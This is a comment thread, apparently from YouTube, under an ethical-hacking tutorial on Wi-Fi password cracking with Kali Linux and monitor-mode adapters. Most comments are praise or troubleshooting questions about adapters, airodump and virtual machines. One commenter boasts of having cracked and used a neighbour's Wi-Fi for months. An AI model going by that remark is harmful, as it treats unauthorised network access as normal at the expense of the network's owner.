    Love your videos! Thank you 😊

  • @a21123
    @a21123 2 หลายเดือนก่อน

    You are a legend in my friend group Mr.Bombal

  • @MUHAMMADAZEEM-zv7mc
    @MUHAMMADAZEEM-zv7mc 2 ปีที่แล้ว

    wonderful good work and very informative video on wifi cracking than other youtubers

  • @OPatron24
    @OPatron24 ปีที่แล้ว

    Loved the video, thank you David!

  • @zahidjaan1319
    @zahidjaan1319 3 ปีที่แล้ว

    Thank U Sir, Favourite as always !

  • @AbdulAli-xh9pf
    @AbdulAli-xh9pf 2 ปีที่แล้ว +1

    Great content... deserves a sub❤️

  • @just_shim
    @just_shim ปีที่แล้ว

    Amazing! I'm new in learning ethical hacking, your videos are very helpful!

  • @Nexalian_Gamer
    @Nexalian_Gamer 3 หลายเดือนก่อน

    Thanks for the tutorial. Been using my neighbor's wifi for 3 months now. It only took my Pi 30 minutes to crack the password 👍👍

  • @ivanboard777
    @ivanboard777 2 ปีที่แล้ว +1

    Thank You A Lot Mr.David, very helpful videos. Greetings From Milano, Italy :-D

  • @microsoftsarker
    @microsoftsarker 6 หลายเดือนก่อน

    Thanks man!! It was helpful 😃Thanks a lot

  • @Memnoch67
    @Memnoch67 3 ปีที่แล้ว

    Hey, interesting stuff you have. I am always searching for things I never knew anything about this will be added to my daily dose of mental exercises...(for educational purposes only of course) I have learned as we get older our memory starts slipping little by little and memory is the foundation for experience which is the foundation of intellect...ECT... Thank you and thumbs up I will SUB and occasionally share (unless instructed otherwise)

  • @dashcamdiariessa
    @dashcamdiariessa 2 ปีที่แล้ว

    Hi David.
    What’s the opinion on the Panda PAU’s I have the 05 and 09 and I just get endless issues where running airodump and nothing gets detected. Even after I use check kill I get zero results. It is very inconsistent. Sometimes i have to unplug the device and plug it in again and the it works again sometimes not even. This is on VBox, VPlayer and RPi 3 and 4.
    Do you sometimes get these type of results with your device, or is it mostly related to the Panda PAU’s. I initially bought them a few years ago due to price and shipping to South Africa

  • @auldcrow1461
    @auldcrow1461 2 ปีที่แล้ว

    Clear tutorial, you gained a sub. Unsure why 318 folk disliked this

  • @somchaiveeragul5743
    @somchaiveeragul5743 10 หลายเดือนก่อน

    Thank you very much for the knowledge you have received. Really great as it is very detailed explanation with examples.

  • @MatheusBezerra93
    @MatheusBezerra93 8 หลายเดือนก่อน

    Great lesson. Greetings from Brazil.

  • @andysoto6272
    @andysoto6272 2 ปีที่แล้ว

    Amazing Course! Thanks a lot!

  • @binathon8020
    @binathon8020 3 ปีที่แล้ว

    Thank you so much !!! I’m learning

  • @cdm297
    @cdm297 2 ปีที่แล้ว

    Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌

  • @bustsomecaps
    @bustsomecaps 3 ปีที่แล้ว

    awesome video im much more drawn to kali just for fun this stuff is just so interesting!

  • @AhmedAli-il5yx
    @AhmedAli-il5yx 2 ปีที่แล้ว +1

    You have such a great and easy way of explanation. Thank you for providing such valuable information

  • @oncledan8509
    @oncledan8509 ปีที่แล้ว

    Hi David.
    I finally received my Alpha Wi-Fi Adaptor (YESSSS !!) and ready to explore with you.
    One thing I noticed (at timing 5:45) is that I receive a bunch of ESSID with name . In fact, I have LOTS of them, almost twice the amount of « valid » ESSIDs. Any idea why ? It fills my screen to a point where I can not see the bottom part, where I can see the Stations.
    Oh! I use Kali on an old PC I repurposed just for this OS. Is that what they call « Bare-Metal » .. or « Hard-Metal » ? Not using VM on Windows for this one.
    Thank you for your input on that small problem. I hope to read from you soon, for I'm stuck ! Have a great day ! I love your videos.

  • @apaicuh
    @apaicuh 2 ปีที่แล้ว +1

    nice , 8 hours and 40 minute time left. great tutorial

  • @tulgaa07
    @tulgaa07 10 หลายเดือนก่อน

    Love your videos, very informative :) Question: I run my Kali on Parallels on a M1 Macbook. Would the adapters work for me?